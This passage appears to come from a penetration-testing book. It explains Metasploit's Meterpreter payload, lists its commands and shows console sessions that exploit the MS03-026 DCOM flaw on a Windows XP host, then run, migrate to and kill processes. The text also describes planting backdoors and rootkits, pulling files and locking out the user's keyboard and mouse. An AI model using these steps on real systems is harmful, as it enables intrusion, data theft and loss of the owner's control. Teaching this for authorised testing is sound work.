When you successfully exploit a remote computer, the next task is to interact with the system in order to further your goals, whatever they may be. The most common form of interaction is entering textual commands into a remote command shell. Unix-style operating systems such as Linux or Mac OS X have rich command shells that provide a powerful environment for further system control. Windows, on the other hand, has a command shell left over from the DOS days that provides very limited functionality.
One way around the limited command shell of Windows is to use the VNC payload (see Choosing a Payload), which gives you a graphical interface to the compromised computer. However, the VNC payload has some drawbacks. VNC connections require relatively high bandwidth in order to be useable. If the compromised computer is on a low bandwidth connection or is located on the other side of the world, the VNC connection may be so slow as to be worthless. Using VNC also can give you away—any interaction you take with the remote computer will be displayed on its monitor. If someone happens to be in front of the computer while you're trying to control it with VNC, your presence will be detected very quickly.
In order to address the shortcomings of the traditional shell and VNC payloads, Metasploit includes a special payload for Windows called the Meterpreter. The Meterpreter is a rich command shell for Windows that provides many commands missing from the normal Windows shell, as well as a few additional capabilities geared specifically for exploitation.
You use the Meterpreter by selecting one of its variants as the payload for an exploit. If the exploit succeeds, you'll be presented with the Meterpreter prompt:
msf exploit(ms03_026_dcom) >set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms03_026_dcom) >exploit[*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ... [*] Sending exploit ... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.150.9.46:60090 -> 10.157.6.231:4444) [*] The DCERPC service did not reply to our request meterpreter >
The Meterpreter has a large list of commands, some of which aren't discussed here, and new commands can be added at any time. To get a complete list of these commands, type help or ? from the Meterpreter prompt. To learn more about a specific command, you can type commandname -h. Some simple commands don't support the -h flag, but the complex ones typically do.
Here are some useful Meterpreter commands:
sysinfoDisplays useful information about the host you've just exploited, including the computer's name, operating system, and patchlevel.
pwdDisplays the current working directory. This typically starts out as the Windows system directory.
cdChanges the current working directory. This command accepts both DOS- and Unix-style path arguments (i.e., cd c:\ and cd / both perform the same operation).
lsDisplays a listing of the files in the current working directory. The output is much closer to that of the Unix ls than that of the Windows' dir command.
catPrints the contents of a file to the screen, just as cat on a Unix system would.
downloadCopies the contents of a file from the remote system to the local (the computer running Metasploit) filesystem. You can use this feature to download valuable information for offline analysis.
uploadUploads a file from the local filesystem to the remote computer. You can use this command to upload backdoors, rootkits (see Chapter 12), or Trojaned versions of binaries already on the system.
editOpens the contents of a file for you to edit. One very nice feature of the edit command is that it opens the file on the local computer using the editor of your choice.
executeExecutes a file on the remote computer from its filesystem. This can either be a pre-existing file or one you've recently uploaded.
ipconfigDisplays the network settings of the remote computer.
getpidDisplays the current PID (process ID) of the process hosting the Meterpreter. This is likely the vulnerable process you exploited in order to run the Meterpreter.
getuidDisplays the username of the owner of the process. The user determines what control you have over the remote computer. Normal users can typically modify only their own files, while an administrator usually has full control over the system. The special user named SYSTEM has the highest privilege level obtainable.
psDisplays a list of all the processes currently running on the remote computer along with a PID (process ID).
killKills a process. The argument to the kill function is a PID you received from either getpid or ps. (Killing the PID value you received from getpid without first migrating the process will almost certainly cause your Meterpreter session to close, as you've just killed the Meterpreter's process.)
migrateMigrates the Meterpreter code and thread of execution to a different process, all without disrupting the Meterpreter console in the slightest. If the process you exploited is not trustworthy, you can use this command to migrate to something more stable.
portfwdSimilar to SSH tunneling (see Chapter 15), this command lets you open a port on the local computer that will be tunneled via Meterpreter to a remote computer and port. You can use this functionality to progressively work further into a network, computer by computer, just as you can with Core Impact (see Task Overview through The Canvas Exploit Framework).
regLets you view or modify the Windows registry on the remote computer. Almost all of Windows' settings are in the registry (from password policies to firewall settings), so modification allows for some interesting possibilities.
idletimeDisplays the amount of time the computer has been "idle" (i.e., no one has been moving the keyboard or mouse). You can use this feature to try to time disruptive actions (e.g., rebooting the computer) for when the computer is unattended.
uictlAllows you to disable (or re-enable) the keyboard or mouse on the remote computer. You can use this to temporarily prevent the computer's user from taking any action (perhaps to get rid of you, for example).
irbSpawns an interactive Ruby shell. From this shell, you can interact with Meterpreter's internals and script its behavior directly by using its API.
runSimilar to the irb command, but it runs a Ruby script from the local filesystem instead of giving you an interactive shell.
quitQuits the Meterpreter session, closing the network connection and returning you to the Metasploit prompt.
Here's an example of Metasploit being used to launch a Meterpreter session on the remote computer Yakima:
msf >use windows/dcerpc/ms03_026_dcommsf exploit(ms03_026_dcom) >set RHOST yakimaRHOST => yakima msf exploit(ms03_026_dcom) >set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms03_026_dcom) >exploit[*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ... [*] Sending exploit ... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.150.9.46:60603 -> 10.157.6.231:4444) [*] The DCERPC service did not reply to our request meterpreter >sysinfoComputer: YAKIMA OS : Windows XP (Build 2600, Service Pack 1). meterpreter >pwdc:\windows\system32 meterpreter >ls calc*Listing: calc* ============== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 114688 fil Mon Mar 31 05:00:00 PST 2003 calc.exe meterpreter >execute calc.exe[-] You must specify an executable file with -f meterpreter >execute -f calc.exeProcess 652 created. meterpreter >getpidCurrent pid: 920 meterpreter >migrate 652[*] Migrating to 652... [*] Migration completed successfully. meterpreter >getpidCurrent pid: 652 meterpreter >kill 652Killing: 652 [-] Error while running command kill: execution expired meterpreter >quit[*] Meterpreter session 1 closed. msf exploit(ms03_026_dcom) >
In the preceding example, we first gather some information about the system. Then we find a program on the remote filesystem and execute it. We next migrate the Meterpreter session to the new process. Finally, to demonstrate that the migration worked, we kill the process we migrated to and notice that the session has timed out.